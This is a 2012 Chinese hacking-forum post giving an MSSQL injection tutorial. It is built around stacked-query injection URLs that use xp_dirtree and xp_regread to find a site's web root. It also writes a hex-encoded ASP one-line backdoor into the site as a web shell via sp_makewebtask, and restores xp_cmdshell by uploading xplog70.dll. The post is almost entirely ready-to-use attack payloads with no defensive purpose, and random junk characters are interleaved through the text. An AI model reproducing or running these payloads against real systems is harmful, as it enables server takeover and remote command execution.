找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 MSsqlL注入取得网站路径最好的方法
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2348|回复: 0
打印 上一主题 下一主题

MSsqlL注入取得网站路径最好的方法

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 17:20:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
好,我们exec master..xp_dirtree'd:/test'
( l9 O/ w# b5 p% X& O假设我们在test里有两个文件夹test1和test2在test1里又有test3; V8 T4 Y. i/ C& v  H" `
结果显示
! `- _5 W1 t0 P' ?+ v! V( n" F8 o4 G+ c) F# X9 G7 C6 t
subdirectory depth1 h1 m9 K8 d5 Z4 H
test1 1$ c  F, S6 V1 K# h: t+ s4 ~) ]: x
test3 2
2 G7 m; e6 ?2 Vtest2 1
+ M: i2 E5 |) B7 t- j9 b# j# t9 V# k
哈哈发现没有那个depth就是目录的级数) y9 s3 p5 [4 O
ok了,知道怎么办了吧$ \4 K! K3 U% z8 H1 q
. z- k& M; j) @. \2 e
http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000),id int)--
* u9 t4 f0 _& ?7 q! E# @5 [- Uhttp://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'd:\' -- : q" y0 r' w& _
http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where id=1)-
9 F* c0 N9 M% o* n( l  M
3 v0 f- N/ I0 L% F* W; x' }3 f只要加上id=1,就是第一级目录 。
' i+ L* O& S4 w9 N. ?' O8 x3 _- b9 G5 J! i  k
" D3 N5 k; W6 c% R
通过注册表读网站路径:
2 x/ a* B% d$ F7 p0 K9 ^; l
* j( p% g' {4 H5 P0 {$ W5 I& f8 G1.;create table [dbo].[cyfd] ([gyfd][char](255));
0 |$ P. x/ A* s& r/ x' M' M* [& e9 {: ~! X
2.DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into 临时表 (临时字段名) values(@result);--1 G' s. G% ?3 f& }, t" V: x' C
id=2;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into cyfd (gyfd) values(@result);--
! Z/ ]& K5 _' _6 [+ c7 L. [2 A( Y+ S4 M
3.and 1=(select count(*) from 临时表 where 临时字段名>1)
/ _; Y' s) ?- x, xand 1=(select count(*) from cyfd where gyfd > 1) 4 k9 d: k' r' {2 u/ k3 B. p( U' z5 Z
这样IE报错,就把刚才插进去的Web路径的值报出来了6 v$ b. t: o4 |9 _1 h, Z! b

4 |7 O6 X5 `! P8 E1 s9 p: b% [4.drop table cyfd;-- 删除临时表( B- h* a& i6 ?$ d1 W9 k  v
" g# E- X2 Y; A+ `" V) I' q, h( [8 \
获得webshell方法:
" V1 \2 d& \. {4 G! \* \1.create table cmd (a image)-- \**cmd是创建的临时表
5 D( r+ s; V4 J# V! S% {) \! b. N2 E
* X% B6 x) I4 r2.insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)-- 往cmd表里插入一句话
5 x1 U5 k) Q6 E0 r+ T7 @' a- {7 z8 X7 K6 l( b$ O& L3 W+ x
! m1 W$ E3 G; P  o- ], g& Y  E
3.EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT image FROM cmd'
0 _, T+ {, t9 X; @, p% dEXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'% F7 c3 U& t" f  d% _1 V

+ L* j$ c3 ^+ Y- p7 Y6 u& ^1 P  I3 o4.drop table cmd;-- 删除cmd临时表
8 N& [) J- Z1 A: d
" F: X) l8 H/ d  @4 s! k恢复xp_cmdshell方法之一:3 G. H/ ~- d0 A
我很快就把xplog70.dll文件给他上传到e:\inetpub\wwwroot目录下了,来吧,我们来给他恢复,提交:5 a/ v- Y$ X) d# e# _! e4 i$ @7 ?* M
http://www.something.com/script.asp?id=2;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetpub\wwwroot\xplog70.dll': T/ C5 w5 B$ y: z: e
恢复,支持绝对路径的恢复哦。:)% |1 `) t( R$ h4 p
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表